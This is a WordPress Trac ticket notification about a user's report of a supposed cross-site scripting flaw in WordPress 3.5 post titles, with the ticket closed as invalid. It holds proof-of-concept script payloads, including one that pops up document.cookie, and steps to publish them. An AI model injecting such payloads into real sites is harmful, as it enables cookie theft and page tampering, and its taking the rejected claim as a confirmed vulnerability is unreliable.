[wp-trac] [WordPress Trac] #22861: Wordpress 3.5 - Cross Site Scripting Vulnerability
WordPress Trac
noreply at wordpress.org
Tue Dec 11 21:25:27 UTC 2012
#22861: Wordpress 3.5 - Cross Site Scripting Vulnerability
-----------------------------+----------------------
Reporter: shubhammittal01 | Owner:
Type: defect (bug) | Status: closed
Priority: normal | Milestone:
Component: General | Version:
Severity: normal | Resolution: invalid
Keywords: |
-----------------------------+----------------------
Description changed by ocean90:
Old description:
> Hi, My name is Shubham Mittal. I have a bug at new Wordpress (latest
> version, 3.5). This bug is Cross Site Scripting.
>
> [XSS] New Wp-Post
>
> Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
> Author : Shubham Mittal[[BR]]
> E-mail : upgoingstaar at gmail.com [[BR]]
> Webpage: http://3ncrypt0r.blogspot.com[[BR]]
> Version CMS : Version 3.5 (Last Version) [[BR]]
> Category : WebApps / Content Management System (CMS) [[BR]]
> Security Risk: Medium Level [[BR]]
> Link Downlaod: http://www.wordpress.org/ [[BR]]
> Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit
>
> [Information Content]
> WordPress - Web Publishing Software. http://www.wordpress.org/
>
> [Vulnerability Details]
>
> XSS CODE:
> <script>alert("XSSedByShubham")>[[BR]]
> </script<script>alert(document.cookie);</script>[[BR]]
> <script>window.open("http://www.google.com/")</script>
>
> Exploit Report:
> 1. Create / Edit Wp-Post
> Input "Title Post" with script XSS Code.
> <script>alert("XSSedByShubham")</script>
>
> 2. http://example.com/wp-admin/post-new.php <---Publish It
>
> 3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
> [[Image(http://4.bp.blogspot.com/-zNKPa-
> mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg)]]
>
> Thanks
>
> Shubham Mittal
> @upgoingstar
New description:
Hi, My name is Shubham Mittal. I have a bug at new Wordpress (latest
version, 3.5). This bug is Cross Site Scripting.
[XSS] New Wp-Post
Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
Author : Shubham Mittal[[BR]]
E-mail : upgoingstaar at gmail.com [[BR]]
Webpage: http://3ncrypt0r.blogspot.com[[BR]]
Version CMS : Version 3.5 (Last Version) [[BR]]
Category : WebApps / Content Management System (CMS) [[BR]]
Security Risk: Medium Level [[BR]]
Link Downlaod: http://www.wordpress.org/ [[BR]]
Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit
[Information Content]
WordPress - Web Publishing Software. http://www.wordpress.org/
[Vulnerability Details]
XSS CODE:
<script>alert("XSSedByShubham")>[[BR]]
</script<script>alert(document.cookie);</script>[[BR]]
<script>window.open("http://www.google.com/")</script>
Exploit Report:
1. Create / Edit Wp-Post
Input "Title Post" with script XSS Code.
<script>alert("XSSedByShubham")</script>
2. http://example.com/wp-admin/post-new.php <---Publish It
3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
http://4.bp.blogspot.com/-zNKPa-
mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg
Thanks
Shubham Mittal
@upgoingstar
--
--
Ticket URL: <http://core.trac.wordpress.org/ticket/22861#comment:2>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list